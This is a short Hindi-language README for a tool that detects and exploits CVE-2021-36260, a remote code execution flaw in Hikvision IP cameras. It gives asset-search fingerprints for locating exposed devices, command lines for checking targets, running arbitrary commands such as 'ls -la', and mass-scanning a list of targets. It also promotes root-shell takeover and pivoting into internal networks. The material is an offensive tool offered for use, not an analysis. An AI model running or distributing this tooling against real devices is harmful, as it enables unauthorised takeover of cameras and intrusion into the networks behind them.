
हाइकविजन RCE भेद्यता समूह निदान एवं शोषण उपकरण
हमलावर इस भेद्यता का उपयोग करके असीमित रूट शेल के साथ डिवाइस पर पूर्ण नियंत्रण प्राप्त कर सकते हैं, भले ही डिवाइस का मालिक सीमित संरक्षित शेल (psh) तक ही सीमित हो। IP कैमरों में घुसपैठ के अलावा, वे आंतरिक नेटवर्क तक पहुँच और उस पर हमला भी कर सकते हैं।
header="Hikvision"
app="HIKVISION-视频监控"
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"
python ./CVE-2021-36260.py -f target.txt
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Start scanning url
-f FILE, --file FILE read the url from the file
--check Check if vulnerable
--cmd CMD execute cmd (i.e: "ls -l")
बैच में SRC खोज सकते हैं